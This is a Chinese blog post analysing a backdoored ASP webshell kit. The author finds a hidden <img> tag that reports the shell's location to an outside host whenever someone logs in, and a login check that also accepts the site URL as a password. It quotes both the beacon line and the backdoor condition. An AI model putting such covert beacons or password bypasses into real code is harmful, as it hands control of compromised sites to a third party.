欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

webshell后门分析第一篇

程序员文章站 2022-07-03 08:10:18
  今天一位学员发来了webshell箱子 但是箱子里面没有明显的密码 不像以前的箱子      这种webshell箱子 引起了我莫大...

  今天一位学员发来了webshell箱子 但是箱子里面没有明显的密码 不像以前的箱子

     这种webshell箱子 引起了我莫大的兴趣。

如图:

webshell后门分析第一篇  

 

       立马想了一个方案。。随便找了几个webshell 进行爆破 。

        几分钟后得到一个webshell

       注:webshell 没有加密的 这里没得写解密过程了。

       下了个asp小型服务器 打开进程里面 进行监控 输入正确密码 查找一切GET /POST之类的相关连接

       果断有发现 如图所示:

           webshell后门分析第一篇

 

       留意host 这里估计就是收信的地址 whois 果断得到 箱子作者的QQ邮箱加QQ号 其实我真不想社 俺晚上还有初中聚会岂能表现出闲得蛋疼的样子,果断不扯淡做箱子的人。

       这里感到很奇怪 以往的的webshell箱子 都是获取网址+密码 然后发送到远程服务器。 但是这个webshell很另类。难道我孤陋寡闻。还是 落后了 我的思想。

      看到


<img src='http://www.moonhack.org/web/pr/?"&u&"'></img>

 

webshell后门分析第一篇

 

看到这个标签 我表示作者真的很有水平,<img>我表示成功登陆 肯定会执行一次 ,所以在远程服务器做一个记录就行了。多隐蔽但是岂能 逃出哥的法眼。

         回想起 我们之前箱子所说 后缀 参数 这里不知道我说什么,请回去看我们第一张高清有码图。根据这个这些 我仔细阅读了这份没有加密的网马 ?果断有所发现:

       如图所示:

              webshell后门分析第一篇

              跟踪 URL变量 三十二个有木有

       如图所示:

              webshell后门分析第一篇

       好吧 我仔细看 看到这块代码 感觉不对

 

if session("KKK")<>UserPass then

 

if request.form("pass")<>"" or request("pass")<>"" then

 

if request.form("pass")=UserPass or request.form("pass")=url then

 

session("KKK")=UserPass

 

response.redirect url

 

else

 


最后一个if 有逻辑问题 传入来的变量 等于UserPass或者 等于url 只有满足其中一个就可以登录了。

 

         最后结果如图:

                    webshell后门分析第一篇

                 ---------------淫荡分割-------

                   webshell后门分析第一篇

                     分析完毕后 又发来一只网马  好吧 等我聚会回来继续帮你分析